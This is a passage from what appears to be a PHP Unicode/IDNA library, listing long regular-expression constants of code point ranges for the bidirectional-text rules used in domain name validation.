\\x{10B35}\\x{10B36}-\\x{10B38}\\x{10B39}-\\x{10B3F}\\x{10B40}-\\x{10B55}\\x{10B56}-\\x{10B57}\\x{10B58}-\\x{10B5F}\\x{10B60}-\\x{10B72}\\x{10B73}-\\x{10B77}\\x{10B78}-\\x{10B7F}\\x{10B80}-\\x{10B91}\\x{10B92}-\\x{10B98}\\x{10B99}-\\x{10B9C}\\x{10B9D}-\\x{10BA8}\\x{10BA9}-\\x{10BAF}\\x{10BB0}-\\x{10BFF}\\x{10C00}-\\x{10C48}\\x{10C49}-\\x{10C7F}\\x{10C80}-\\x{10CB2}\\x{10CB3}-\\x{10CBF}\\x{10CC0}-\\x{10CF2}\\x{10CF3}-\\x{10CF9}\\x{10CFA}-\\x{10CFF}\\x{10D00}-\\x{10D23}\\x{10D24}-\\x{10D27}\\x{10D28}-\\x{10D2F}\\x{10D30}-\\x{10D39}\\x{10D3A}-\\x{10D3F}\\x{10D40}-\\x{10E5F}\\x{10E60}-\\x{10E7E}\\x{10E7F}\\x{10E80}-\\x{10EA9}\\x{10EAA}\\x{10EAB}-\\x{10EAC}\\x{10EAD}\\x{10EAE}-\\x{10EAF}\\x{10EB0}-\\x{10EB1}\\x{10EB2}-\\x{10EFF}\\x{10F00}-\\x{10F1C}\\x{10F1D}-\\x{10F26}\\x{10F27}\\x{10F28}-\\x{10F2F}\\x{10F30}-\\x{10F45}\\x{10F46}-\\x{10F50}\\x{10F51}-\\x{10F54}\\x{10F55}-\\x{10F59}\\x{10F5A}-\\x{10F6F}\\x{10F70}-\\x{10FAF}\\x{10FB0}-\\x{10FC4}\\x{10FC5}-\\x{10FCB}\\x{10FCC}-\\x{10FDF}\\x{10FE0}-\\x{10FF6}\\x{10FF7}-\\x{10FFF}\\x{11001}\\x{11038}-\\x{11046}\\x{11052}-\\x{11065}\\x{1107F}-\\x{11081}\\x{110B3}-\\x{110B6}\\x{110B9}-\\x{110BA}\\x{11100}-\\x{11102}\\x{11127}-\\x{1112B}\\x{1112D}-\\x{11134}\\x{11173}\\x{11180}-\\x{11181}\\x{111B6}-\\x{111BE}\\x{111C9}-\\x{111CC}\\x{111CF}\\x{1122F}-\\x{11231}\\x{11234}\\x{11236}-\\x{11237}\\x{1123E}\\x{112DF}\\x{112E3}-\\x{112EA}\\x{11300}-\\x{11301}\\x{1133B}-\\x{1133C}\\x{11340}\\x{11366}-\\x{1136C}\\x{11370}-\\x{11374}\\x{11438}-\\x{1143F}\\x{11442}-\\x{11444}\\x{11446}\\x{1145E}\\x{114B3}-\\x{114B8}\\x{114BA}\\x{114BF}-\\x{114C0}\\x{114C2}-\\x{114C3}\\x{115B2}-\\x{115B5}\\x{115BC}-\\x{115BD}\\x{115BF}-\\x{115C0}\\x{115DC}-\\x{115DD}\\x{11633}-\\x{1163A}\\x{1163D}\\x{1163F}-\\x{11640}\\x{11660}-\\x{1166C}\\x{116AB}\\x{116AD}\\x{116B0}-\\x{116B5}\\x{116B7}\\x{1171D}-\\x{1171F}\\x{11722}-\\x{11725}\\x{11727}-\\x{1172B}\\x{1182F}-\\x{11837}\\x{11839}-\\x{1183A}\\x{1193B}-\\x{1193C}\\x{1193E}\\x{11943}\\x{119D4}-\\x{119D7}\\x{119DA}-\\x{119DB}\\x{119E0}\\x{11A01}-\\x{11A06}\\x{11A09}-\\x{11A0A}\\x{11A33}-\\x{11A38}\\x{11A3B}-\\x{11A3E}\\x{11A47}\\x{11A51}-\\x{11A56}\\x{11A59}-\\x{11A5B}\\x{11A8A}-\\x{11A96}\\x{11A98}-\\x{11A99}\\x{11C30}-\\x{11C36}\\x{11C38}-\\x{11C3D}\\x{11C92}-\\x{11CA7}\\x{11CAA}-\\x{11CB0}\\x{11CB2}-\\x{11CB3}\\x{11CB5}-\\x{11CB6}\\x{11D31}-\\x{11D36}\\x{11D3A}\\x{11D3C}-\\x{11D3D}\\x{11D3F}-\\x{11D45}\\x{11D47}\\x{11D90}-\\x{11D91}\\x{11D95}\\x{11D97}\\x{11EF3}-\\x{11EF4}\\x{11FD5}-\\x{11FDC}\\x{11FDD}-\\x{11FE0}\\x{11FE1}-\\x{11FF1}\\x{16AF0}-\\x{16AF4}\\x{16B30}-\\x{16B36}\\x{16F4F}\\x{16F8F}-\\x{16F92}\\x{16FE2}\\x{16FE4}\\x{1BC9D}-\\x{1BC9E}\\x{1BCA0}-\\x{1BCA3}\\x{1D167}-\\x{1D169}\\x{1D173}-\\x{1D17A}\\x{1D17B}-\\x{1D182}\\x{1D185}-\\x{1D18B}\\x{1D1AA}-\\x{1D1AD}\\x{1D200}-\\x{1D241}\\x{1D242}-\\x{1D244}\\x{1D245}\\x{1D300}-\\x{1D356}\\x{1D6DB}\\x{1D715}\\x{1D74F}\\x{1D789}\\x{1D7C3}\\x{1D7CE}-\\x{1D7FF}\\x{1DA00}-\\x{1DA36}\\x{1DA3B}-\\x{1DA6C}\\x{1DA75}\\x{1DA84}\\x{1DA9B}-\\x{1DA9F}\\x{1DAA1}-\\x{1DAAF}\\x{1E000}-\\x{1E006}\\x{1E008}-\\x{1E018}\\x{1E01B}-\\x{1E021}\\x{1E023}-\\x{1E024}\\x{1E026}-\\x{1E02A}\\x{1E130}-\\x{1E136}\\x{1E2EC}-\\x{1E2EF}\\x{1E2FF}\\x{1E800}-\\x{1E8C4}\\x{1E8C5}-\\x{1E8C6}\\x{1E8C7}-\\x{1E8CF}\\x{1E8D0}-\\x{1E8D6}\\x{1E8D7}-\\x{1E8FF}\\x{1E900}-\\x{1E943}\\x{1E944}-\\x{1E94A}\\x{1E94B}\\x{1E94C}-\\x{1E94F}\\x{1E950}-\\x{1E959}\\x{1E95A}-\\x{1E95D}\\x{1E95E}-\\x{1E95F}\\x{1E960}-\\x{1EC6F}\\x{1EC70}\\x{1EC71}-\\x{1ECAB}\\x{1ECAC}\\x{1ECAD}-\\x{1ECAF}\\x{1ECB0}\\x{1ECB1}-\\x{1ECB4}\\x{1ECB5}-\\x{1ECBF}\\x{1ECC0}-\\x{1ECFF}\\x{1ED00}\\x{1ED01}-\\x{1ED2D}\\x{1ED2E}\\x{1ED2F}-\\x{1ED3D}\\x{1ED3E}-\\x{1ED4F}\\x{1ED50}-\\x{1EDFF}\\x{1EE00}-\\x{1EE03}\\x{1EE04}\\x{1EE05}-\\x{1EE1F}\\x{1EE20}\\x{1EE21}-\\x{1EE22}\\x{1EE23}\\x{1EE24}\\x{1EE25}-\\x{1EE26}\\x{1EE27}\\x{1EE28}\\x{1EE29}-\\x{1EE32}\\x{1EE33}\\x{1EE34}-\\x{1EE37}\\x{1EE38}\\x{1EE39}\\x{1EE3A}\\x{1EE3B}\\x{1EE3C}-\\x{1EE41}\\x{1EE42}\\x{1EE43}-\\x{1EE46}\\x{1EE47}\\x{1EE48}\\x{1EE49}\\x{1EE4A}\\x{1EE4B}\\x{1EE4C}\\x{1EE4D}-\\x{1EE4F}\\x{1EE50}\\x{1EE51}-\\x{1EE52}\\x{1EE53}\\x{1EE54}\\x{1EE55}-\\x{1EE56}\\x{1EE57}\\x{1EE58}\\x{1EE59}\\x{1EE5A}\\x{1EE5B}\\x{1EE5C}\\x{1EE5D}\\x{1EE5E}\\x{1EE5F}\\x{1EE60}\\x{1EE61}-\\x{1EE62}\\x{1EE63}\\x{1EE64}\\x{1EE65}-\\x{1EE66}\\x{1EE67}-\\x{1EE6A}\\x{1EE6B}\\x{1EE6C}-\\x{1EE72}\\x{1EE73}\\x{1EE74}-\\x{1EE77}\\x{1EE78}\\x{1EE79}-\\x{1EE7C}\\x{1EE7D}\\x{1EE7E}\\x{1EE7F}\\x{1EE80}-\\x{1EE89}\\x{1EE8A}\\x{1EE8B}-\\x{1EE9B}\\x{1EE9C}-\\x{1EEA0}\\x{1EEA1}-\\x{1EEA3}\\x{1EEA4}\\x{1EEA5}-\\x{1EEA9}\\x{1EEAA}\\x{1EEAB}-\\x{1EEBB}\\x{1EEBC}-\\x{1EEEF}\\x{1EEF0}-\\x{1EEF1}\\x{1EEF2}-\\x{1EEFF}\\x{1EF00}-\\x{1EFFF}\\x{1F000}-\\x{1F02B}\\x{1F030}-\\x{1F093}\\x{1F0A0}-\\x{1F0AE}\\x{1F0B1}-\\x{1F0BF}\\x{1F0C1}-\\x{1F0CF}\\x{1F0D1}-\\x{1F0F5}\\x{1F100}-\\x{1F10A}\\x{1F10B}-\\x{1F10C}\\x{1F10D}-\\x{1F10F}\\x{1F12F}\\x{1F16A}-\\x{1F16F}\\x{1F1AD}\\x{1F260}-\\x{1F265}\\x{1F300}-\\x{1F3FA}\\x{1F3FB}-\\x{1F3FF}\\x{1F400}-\\x{1F6D7}\\x{1F6E0}-\\x{1F6EC}\\x{1F6F0}-\\x{1F6FC}\\x{1F700}-\\x{1F773}\\x{1F780}-\\x{1F7D8}\\x{1F7E0}-\\x{1F7EB}\\x{1F800}-\\x{1F80B}\\x{1F810}-\\x{1F847}\\x{1F850}-\\x{1F859}\\x{1F860}-\\x{1F887}\\x{1F890}-\\x{1F8AD}\\x{1F8B0}-\\x{1F8B1}\\x{1F900}-\\x{1F978}\\x{1F97A}-\\x{1F9CB}\\x{1F9CD}-\\x{1FA53}\\x{1FA60}-\\x{1FA6D}\\x{1FA70}-\\x{1FA74}\\x{1FA78}-\\x{1FA7A}\\x{1FA80}-\\x{1FA86}\\x{1FA90}-\\x{1FAA8}\\x{1FAB0}-\\x{1FAB6}\\x{1FAC0}-\\x{1FAC2}\\x{1FAD0}-\\x{1FAD6}\\x{1FB00}-\\x{1FB92}\\x{1FB94}-\\x{1FBCA}\\x{1FBF0}-\\x{1FBF9}\\x{1FFFE}-\\x{1FFFF}\\x{2FFFE}-\\x{2FFFF}\\x{3FFFE}-\\x{3FFFF}\\x{4FFFE}-\\x{4FFFF}\\x{5FFFE}-\\x{5FFFF}\\x{6FFFE}-\\x{6FFFF}\\x{7FFFE}-\\x{7FFFF}\\x{8FFFE}-\\x{8FFFF}\\x{9FFFE}-\\x{9FFFF}\\x{AFFFE}-\\x{AFFFF}\\x{BFFFE}-\\x{BFFFF}\\x{CFFFE}-\\x{CFFFF}\\x{DFFFE}-\\x{E0000}\\x{E0001}\\x{E0002}-\\x{E001F}\\x{E0020}-\\x{E007F}\\x{E0080}-\\x{E00FF}\\x{E0100}-\\x{E01EF}\\x{E01F0}-\\x{E0FFF}\\x{EFFFE}-\\x{EFFFF}\\x{FFFFE}-\\x{FFFFF}\\x{10FFFE}-\\x{10FFFF}]/u'; const BIDI_STEP_3 = '/[\\x{0030}-\\x{0039}\\x{00B2}-\\x{00B3}\\x{00B9}\\x{0590}\\x{05BE}\\x{05C0}\\x{05C3}\\x{05C6}\\x{05C8}-\\x{05CF}\\x{05D0}-\\x{05EA}\\x{05EB}-\\x{05EE}\\x{05EF}-\\x{05F2}\\x{05F3}-\\x{05F4}\\x{05F5}-\\x{05FF}\\x{0600}-\\x{0605}\\x{0608}\\x{060B}\\x{060D}\\x{061B}\\x{061C}\\x{061D}\\x{061E}-\\x{061F}\\x{0620}-\\x{063F}\\x{0640}\\x{0641}-\\x{064A}\\x{0660}-\\x{0669}\\x{066B}-\\x{066C}\\x{066D}\\x{066E}-\\x{066F}\\x{0671}-\\x{06D3}\\x{06D4}\\x{06D5}\\x{06DD}\\x{06E5}-\\x{06E6}\\x{06EE}-\\x{06EF}\\x{06F0}-\\x{06F9}\\x{06FA}-\\x{06FC}\\x{06FD}-\\x{06FE}\\x{06FF}\\x{0700}-\\x{070D}\\x{070E}\\x{070F}\\x{0710}\\x{0712}-\\x{072F}\\x{074B}-\\x{074C}\\x{074D}-\\x{07A5}\\x{07B1}\\x{07B2}-\\x{07BF}\\x{07C0}-\\x{07C9}\\x{07CA}-\\x{07EA}\\x{07F4}-\\x{07F5}\\x{07FA}\\x{07FB}-\\x{07FC}\\x{07FE}-\\x{07FF}\\x{0800}-\\x{0815}\\x{081A}\\x{0824}\\x{0828}\\x{082E}-\\x{082F}\\x{0830}-\\x{083E}\\x{083F}\\x{0840}-\\x{0858}\\x{085C}-\\x{085D}\\x{085E}\\x{085F}\\x{0860}-\\x{086A}\\x{086B}-\\x{086F}\\x{0870}-\\x{089F}\\x{08A0}-\\x{08B4}\\x{08B5}\\x{08B6}-\\x{08C7}\\x{08C8}-\\x{08D2}\\x{08E2}\\x{200F}\\x{2070}\\x{2074}-\\x{2079}\\x{2080}-\\x{2089}\\x{2488}-\\x{249B}\\x{FB1D}\\x{FB1F}-\\x{FB28}\\x{FB2A}-\\x{FB36}\\x{FB37}\\x{FB38}-\\x{FB3C}\\x{FB3D}\\x{FB3E}\\x{FB3F}\\x{FB40}-\\x{FB41}\\x{FB42}\\x{FB43}-\\x{FB44}\\x{FB45}\\x{FB46}-\\x{FB4F}\\x{FB50}-\\x{FBB1}\\x{FBB2}-\\x{FBC1}\\x{FBC2}-\\x{FBD2}\\x{FBD3}-\\x{FD3D}\\x{FD40}-\\x{FD4F}\\x{FD50}-\\x{FD8F}\\x{FD90}-\\x{FD91}\\x{FD92}-\\x{FDC7}\\x{FDC8}-\\x{FDCF}\\x{FDF0}-\\x{FDFB}\\x{FDFC}\\x{FDFE}-\\x{FDFF}\\x{FE70}-\\x{FE74}\\x{FE75}\\x{FE76}-\\x{FEFC}\\x{FEFD}-\\x{FEFE}\\x{FF10}-\\x{FF19}\\x{102E1}-\\x{102FB}\\x{10800}-\\x{10805}\\x{10806}-\\x{10807}\\x{10808}\\x{10809}\\x{1080A}-\\x{10835}\\x{10836}\\x{10837}-\\x{10838}\\x{10839}-\\x{1083B}\\x{1083C}\\x{1083D}-\\x{1083E}\\x{1083F}-\\x{10855}\\x{10856}\\x{10857}\\x{10858}-\\x{1085F}\\x{10860}-\\x{10876}\\x{10877}-\\x{10878}\\x{10879}-\\x{1087F}\\x{10880}-\\x{1089E}\\x{1089F}-\\x{108A6}\\x{108A7}-\\x{108AF}\\x{108B0}-\\x{108DF}\\x{108E0}-\\x{108F2}\\x{108F3}\\x{108F4}-\\x{108F5}\\x{108F6}-\\x{108FA}\\x{108FB}-\\x{108FF}\\x{10900}-\\x{10915}\\x{10916}-\\x{1091B}\\x{1091C}-\\x{1091E}\\x{10920}-\\x{10939}\\x{1093A}-\\x{1093E}\\x{1093F}\\x{10940}-\\x{1097F}\\x{10980}-\\x{109B7}\\x{109B8}-\\x{109BB}\\x{109BC}-\\x{109BD}\\x{109BE}-\\x{109BF}\\x{109C0}-\\x{109CF}\\x{109D0}-\\x{109D1}\\x{109D2}-\\x{109FF}\\x{10A00}\\x{10A04}\\x{10A07}-\\x{10A0B}\\x{10A10}-\\x{10A13}\\x{10A14}\\x{10A15}-\\x{10A17}\\x{10A18}\\x{10A19}-\\x{10A35}\\x{10A36}-\\x{10A37}\\x{10A3B}-\\x{10A3E}\\x{10A40}-\\x{10A48}\\x{10A49}-\\x{10A4F}\\x{10A50}-\\x{10A58}\\x{10A59}-\\x{10A5F}\\x{10A60}-\\x{10A7C}\\x{10A7D}-\\x{10A7E}\\x{10A7F}\\x{10A80}-\\x{10A9C}\\x{10A9D}-\\x{10A9F}\\x{10AA0}-\\x{10ABF}\\x{10AC0}-\\x{10AC7}\\x{10AC8}\\x{10AC9}-\\x{10AE4}\\x{10AE7}-\\x{10AEA}\\x{10AEB}-\\x{10AEF}\\x{10AF0}-\\x{10AF6}\\x{10AF7}-\\x{10AFF}\\x{10B00}-\\x{10B35}\\x{10B36}-\\x{10B38}\\x{10B40}-\\x{10B55}\\x{10B56}-\\x{10B57}\\x{10B58}-\\x{10B5F}\\x{10B60}-\\x{10B72}\\x{10B73}-\\x{10B77}\\x{10B78}-\\x{10B7F}\\x{10B80}-\\x{10B91}\\x{10B92}-\\x{10B98}\\x{10B99}-\\x{10B9C}\\x{10B9D}-\\x{10BA8}\\x{10BA9}-\\x{10BAF}\\x{10BB0}-\\x{10BFF}\\x{10C00}-\\x{10C48}\\x{10C49}-\\x{10C7F}\\x{10C80}-\\x{10CB2}\\x{10CB3}-\\x{10CBF}\\x{10CC0}-\\x{10CF2}\\x{10CF3}-\\x{10CF9}\\x{10CFA}-\\x{10CFF}\\x{10D00}-\\x{10D23}\\x{10D28}-\\x{10D2F}\\x{10D30}-\\x{10D39}\\x{10D3A}-\\x{10D3F}\\x{10D40}-\\x{10E5F}\\x{10E60}-\\x{10E7E}\\x{10E7F}\\x{10E80}-\\x{10EA9}\\x{10EAA}\\x{10EAD}\\x{10EAE}-\\x{10EAF}\\x{10EB0}-\\x{10EB1}\\x{10EB2}-\\x{10EFF}\\x{10F00}-\\x{10F1C}\\x{10F1D}-\\x{10F26}\\x{10F27}\\x{10F28}-\\x{10F2F}\\x{10F30}-\\x{10F45}\\x{10F51}-\\x{10F54}\\x{10F55}-\\x{10F59}\\x{10F5A}-\\x{10F6F}\\x{10F70}-\\x{10FAF}\\x{10FB0}-\\x{10FC4}\\x{10FC5}-\\x{10FCB}\\x{10FCC}-\\x{10FDF}\\x{10FE0}-\\x{10FF6}\\x{10FF7}-\\x{10FFF}\\x{1D7CE}-\\x{1D7FF}\\x{1E800}-\\x{1E8C4}\\x{1E8C5}-\\x{1E8C6}\\x{1E8C7}-\\x{1E8CF}\\x{1E8D7}-\\x{1E8FF}\\x{1E900}-\\x{1E943}\\x{1E94B}\\x{1E94C}-\\x{1E94F}\\x{1E950}-\\x{1E959}\\x{1E95A}-\\x{1E95D}\\x{1E95E}-\\x{1E95F}\\x{1E960}-\\x{1EC6F}\\x{1EC70}\\x{1EC71}-\\x{1ECAB}\\x{1ECAC}\\x{1ECAD}-\\x{1ECAF}\\x{1ECB0}\\x{1ECB1}-\\x{1ECB4}\\x{1ECB5}-\\x{1ECBF}\\x{1ECC0}-\\x{1ECFF}\\x{1ED00}\\x{1ED01}-\\x{1ED2D}\\x{1ED2E}\\x{1ED2F}-\\x{1ED3D}\\x{1ED3E}-\\x{1ED4F}\\x{1ED50}-\\x{1EDFF}\\x{1EE00}-\\x{1EE03}\\x{1EE04}\\x{1EE05}-\\x{1EE1F}\\x{1EE20}\\x{1EE21}-\\x{1EE22}\\x{1EE23}\\x{1EE24}\\x{1EE25}-\\x{1EE26}\\x{1EE27}\\x{1EE28}\\x{1EE29}-\\x{1EE32}\\x{1EE33}\\x{1EE34}-\\x{1EE37}\\x{1EE38}\\x{1EE39}\\x{1EE3A}\\x{1EE3B}\\x{1EE3C}-\\x{1EE41}\\x{1EE42}\\x{1EE43}-\\x{1EE46}\\x{1EE47}\\x{1EE48}\\x{1EE49}\\x{1EE4A}\\x{1EE4B}\\x{1EE4C}\\x{1EE4D}-\\x{1EE4F}\\x{1EE50}\\x{1EE51}-\\x{1EE52}\\x{1EE53}\\x{1EE54}\\x{1EE55}-\\x{1EE56}\\x{1EE57}\\x{1EE58}\\x{1EE59}\\x{1EE5A}\\x{1EE5B}\\x{1EE5C}\\x{1EE5D}\\x{1EE5E}\\x{1EE5F}\\x{1EE60}\\x{1EE61}-\\x{1EE62}\\x{1EE63}\\x{1EE64}\\x{1EE65}-\\x{1EE66}\\x{1EE67}-\\x{1EE6A}\\x{1EE6B}\\x{1EE6C}-\\x{1EE72}\\x{1EE73}\\x{1EE74}-\\x{1EE77}\\x{1EE78}\\x{1EE79}-\\x{1EE7C}\\x{1EE7D}\\x{1EE7E}\\x{1EE7F}\\x{1EE80}-\\x{1EE89}\\x{1EE8A}\\x{1EE8B}-\\x{1EE9B}\\x{1EE9C}-\\x{1EEA0}\\x{1EEA1}-\\x{1EEA3}\\x{1EEA4}\\x{1EEA5}-\\x{1EEA9}\\x{1EEAA}\\x{1EEAB}-\\x{1EEBB}\\x{1EEBC}-\\x{1EEEF}\\x{1EEF2}-\\x{1EEFF}\\x{1EF00}-\\x{1EFFF}\\x{1F100}-\\x{1F10A}\\x{1FBF0}-\\x{1FBF9}][\\x{0300}-\\x{036F}\\x{0483}-\\x{0487}\\x{0488}-\\x{0489}\\x{0591}-\\x{05BD}\\x{05BF}\\x{05C1}-\\x{05C2}\\x{05C4}-\\x{05C5}\\x{05C7}\\x{0610}-\\x{061A}\\x{064B}-\\x{065F}\\x{0670}\\x{06D6}-\\x{06DC}\\x{06DF}-\\x{06E4}\\x{06E7}-\\x{06E8}\\x{06EA}-\\x{06ED}\\x{0711}\\x{0730}-\\x{074A}\\x{07A6}-\\x{07B0}\\x{07EB}-\\x{07F3}\\x{07FD}\\x{0816}-\\x{0819}\\x{081B}-\\x{0823}\\x{0825}-\\x{0827}\\x{0829}-\\x{082D}\\x{0859}-\\x{085B}\\x{08D3}-\\x{08E1}\\x{08E3}-\\x{0902}\\x{093A}\\x{093C}\\x{0941}-\\x{0948}\\x{094D}\\x{0951}-\\x{0957}\\x{0962}-\\x{0963}\\x{0981}\\x{09BC}\\x{09C1}-\\x{09C4}\\x{09CD}\\x{09E2}-\\x{09E3}\\x{09FE}\\x{0A01}-\\x{0A02}\\x{0A3C}\\x{0A41}-\\x{0A42}\\x{0A47}-\\x{0A48}\\x{0A4B}-\\x{0A4D}\\x{0A51}\\x{0A70}-\\x{0A71}\\x{0A75}\\x{0A81}-\\x{0A82}\\x{0ABC}\\x{0AC1}-\\x{0AC5}\\x{0AC7}-\\x{0AC8}\\x{0ACD}\\x{0AE2}-\\x{0AE3}\\x{0AFA}-\\x{0AFF}\\x{0B01}\\x{0B3C}\\x{0B3F}\\x{0B41}-\\x{0B44}\\x{0B4D}\\x{0B55}-\\x{0B56}\\x{0B62}-\\x{0B63}\\x{0B82}\\x{0BC0}\\x{0BCD}\\x{0C00}\\x{0C04}\\x{0C3E}-\\x{0C40}\\x{0C46}-\\x{0C48}\\x{0C4A}-\\x{0C4D}\\x{0C55}-\\x{0C56}\\x{0C62}-\\x{0C63}\\x{0C81}\\x{0CBC}\\x{0CCC}-\\x{0CCD}\\x{0CE2}-\\x{0CE3}\\x{0D00}-\\x{0D01}\\x{0D3B}-\\x{0D3C}\\x{0D41}-\\x{0D44}\\x{0D4D}\\x{0D62}-\\x{0D63}\\x{0D81}\\x{0DCA}\\x{0DD2}-\\x{0DD4}\\x{0DD6}\\x{0E31}\\x{0E34}-\\x{0E3A}\\x{0E47}-\\x{0E4E}\\x{0EB1}\\x{0EB4}-\\x{0EBC}\\x{0EC8}-\\x{0ECD}\\x{0F18}-\\x{0F19}\\x{0F35}\\x{0F37}\\x{0F39}\\x{0F71}-\\x{0F7E}\\x{0F80}-\\x{0F84}\\x{0F86}-\\x{0F87}\\x{0F8D}-\\x{0F97}\\x{0F99}-\\x{0FBC}\\x{0FC6}\\x{102D}-\\x{1030}\\x{1032}-\\x{1037}\\x{1039}-\\x{103A}\\x{103D}-\\x{103E}\\x{1058}-\\x{1059}\\x{105E}-\\x{1060}\\x{1071}-\\x{1074}\\x{1082}\\x{1085}-\\x{1086}\\x{108D}\\x{109D}\\x{135D}-\\x{135F}\\x{1712}-\\x{1714}\\x{1732}-\\x{1734}\\x{1752}-\\x{1753}\\x{1772}-\\x{1773}\\x{17B4}-\\x{17B5}\\x{17B7}-\\x{17BD}\\x{17C6}\\x{17C9}-\\x{17D3}\\x{17DD}\\x{180B}-\\x{180D}\\x{1885}-\\x{1886}\\x{18A9}\\x{1920}-\\x{1922}\\x{1927}-\\x{1928}\\x{1932}\\x{1939}-\\x{193B}\\x{1A17}-\\x{1A18}\\x{1A1B}\\x{1A56}\\x{1A58}-\\x{1A5E}\\x{1A60}\\x{1A62}\\x{1A65}-\\x{1A6C}\\x{1A73}-\\x{1A7C}\\x{1A7F}\\x{1AB0}-\\x{1ABD}\\x{1ABE}\\x{1ABF}-\\x{1AC0}\\x{1B00}-\\x{1B03}\\x{1B34}\\x{1B36}-\\x{1B3A}\\x{1B3C}\\x{1B42}\\x{1B6B}-\\x{1B73}\\x{1B80}-\\x{1B81}\\x{1BA2}-\\x{1BA5}\\x{1BA8}-\\x{1BA9}\\x{1BAB}-\\x{1BAD}\\x{1BE6}\\x{1BE8}-\\x{1BE9}\\x{1BED}\\x{1BEF}-\\x{1BF1}\\x{1C2C}-\\x{1C33}\\x{1C36}-\\x{1C37}\\x{1CD0}-\\x{1CD2}\\x{1CD4}-\\x{1CE0}\\x{1CE2}-\\x{1CE8}\\x{1CED}\\x{1CF4}\\x{1CF8}-\\x{1CF9}\\x{1DC0}-\\x{1DF9}\\x{1DFB}-\\x{1DFF}\\x{20D0}-\\x{20DC}\\x{20DD}-\\x{20E0}\\x{20E1}\\x{20E2}-\\x{20E4}\\x{20E5}-\\x{20F0}\\x{2CEF}-\\x{2CF1}\\x{2D7F}\\x{2DE0}-\\x{2DFF}\\x{302A}-\\x{302D}\\x{3099}-\\x{309A}\\x{A66F}\\x{A670}-\\x{A672}\\x{A674}-\\x{A67D}\\x{A69E}-\\x{A69F}\\x{A6F0}-\\x{A6F1}\\x{A802}\\x{A806}\\x{A80B}\\x{A825}-\\x{A826}\\x{A82C}\\x{A8C4}-\\x{A8C5}\\x{A8E0}-\\x{A8F1}\\x{A8FF}\\x{A926}-\\x{A92D}\\x{A947}-\\x{A951}\\x{A980}-\\x{A982}\\x{A9B3}\\x{A9B6}-\\x{A9B9}\\x{A9BC}-\\x{A9BD}\\x{A9E5}\\x{AA29}-\\x{AA2E}\\x{AA31}-\\x{AA32}\\x{AA35}-\\x{AA36}\\x{AA43}\\x{AA4C}\\x{AA7C}\\x{AAB0}\\x{AAB2}-\\x{AAB4}\\x{AAB7}-\\x{AAB8}\\x{AABE}-\\x{AABF}\\x{AAC1}\\x{AAEC}-\\x{AAED}\\x{AAF6}\\x{ABE5}\\x{ABE8}\\x{ABED}\\x{FB1E}\\x{FE00}-\\x{FE0F}\\x{FE20}-\\x{FE2F}\\x{101FD}\\x{102E0}\\x{10376}-\\x{1037A}\\x{10A01}-\\x{10A03}\\x{10A05}-\\x{10A06}\\x{10A0C}-\\x{10A0F}\\x{10A38}-\\x{10A3A}\\x{10A3F}\\x{10AE5}-\\x{10AE6}\\x{10D24}-\\x{10D27}\\x{10EAB}-\\x{10EAC}\\x{10F46}-\\x{10F50}\\x{11001}\\x{11038}-\\x{11046}\\x{1107F}-\\x{11081}\\x{110B3}-\\x{110B6}\\x{110B9}-\\x{110BA}\\x{11100}-\\x{11102}\\x{11127}-\\x{1112B}\\x{1112D}-\\x{11134}\\x{11173}\\x{11180}-\\x{11181}\\x{111B6}-\\x{111BE}\\x{111C9}-\\x{111CC}\\x{111CF}\\x{1122F}-\\x{11231}\\x{11234}\\x{11236}-\\x{11237}\\x{1123E}\\x{112DF}\\x{112E3}-\\x{112EA}\\x{11300}-\\x{11301}\\x{1133B}-\\x{1133C}\\x{11340}\\x{11366}-\\x{1136C}\\x{11370}-\\x{11374}\\x{11438}-\\x{1143F}\\x{11442}-\\x{11444}\\x{11446}\\x{1145E}\\x{114B3}-\\x{114B8}\\x{114BA}\\x{114BF}-\\x{114C0}\\x{114C2}-\\x{114C3}\\x{115B2}-\\x{115B5}\\x{115BC}-\\x{115BD}\\x{115BF}-\\x{115C0}\\x{115DC}-\\x{115DD}\\x{11633}-\\x{1163A}\\x{1163D}\\x{1163F}-\\x{11640}\\x{116AB}\\x{116AD}\\x{116B0}-\\x{116B5}\\x{116B7}\\x{1171D}-\\x{1171F}\\x{11722}-\\x{11725}\\x{11727}-\\x{1172B}\\x{1182F}-\\x{11837}\\x{11839}-\\x{1183A}\\x{1193B}-\\x{1193C}\\x{1193E}\\x{11943}\\x{119D4}-\\x{119D7}\\x{119DA}-\\x{119DB}\\x{119E0}\\x{11A01}-\\x{11A06}\\x{11A09}-\\x{11A0A}\\x{11A33}-\\x{11A38}\\x{11A3B}-\\x{11A3E}\\x{11A47}\\x{11A51}-\\x{11A56}\\x{11A59}-\\x{11A5B}\\x{11A8A}-\\x{11A96}\\x{11A98}-\\x{11A99}\\x{11C30}-\\x{11C36}\\x{11C38}-\\x{11C3D}\\x{11C92}-\\x{11CA7}\\x{11CAA}-\\x{11CB0}\\x{11CB2}-\\x{11CB3}\\x{11CB5}-\\x{11CB6}\\x{11D31}-\\x{11D36}\\x{11D3A}\\x{11D3C}-\\x{11D3D}\\x{11D3F}-\\x{11D45}\\x{11D47}\\x{11D90}-\\x{11D91}\\x{11D95}\\x{11D97}\\x{11EF3}-\\x{11EF4}\\x{16AF0}-\\x{16AF4}\\x{16B30}-\\x{16B36}\\x{16F4F}\\x{16F8F}-\\x{16F92}\\x{16FE4}\\x{1BC9D}-\\x{1BC9E}\\x{1D167}-\\x{1D169}\\x{1D17B}-\\x{1D182}\\x{1D185}-\\x{1D18B}\\x{1D1AA}-\\x{1D1AD}\\x{1D242}-\\x{1D244}\\x{1DA00}-\\x{1DA36}\\x{1DA3B}-\\x{1DA6C}\\x{1DA75}\\x{1DA84}\\x{1DA9B}-\\x{1DA9F}\\x{1DAA1}-\\x{1DAAF}\\x{1E000}-\\x{1E006}\\x{1E008}-\\x{1E018}\\x{1E01B}-\\x{1E021}\\x{1E023}-\\x{1E024}\\x{1E026}-\\x{1E02A}\\x{1E130}-\\x{1E136}\\x{1E2EC}-\\x{1E2EF}\\x{1E8D0}-\\x{1E8D6}\\x{1E944}-\\x{1E94A}\\x{E0100}-\\x{E01EF}]*$/u'; const BIDI_STEP_4_AN = '/[\\x{0600}-\\x{0605}\\x{0660}-\\x{0669}\\x{066B}-\\x{066C}\\x{06DD}\\x{08E2}\\x{10D30}-\\x{10D39}\\x{10E60}-\\x{10E7E}]/u'; const BIDI_STEP_4_EN = 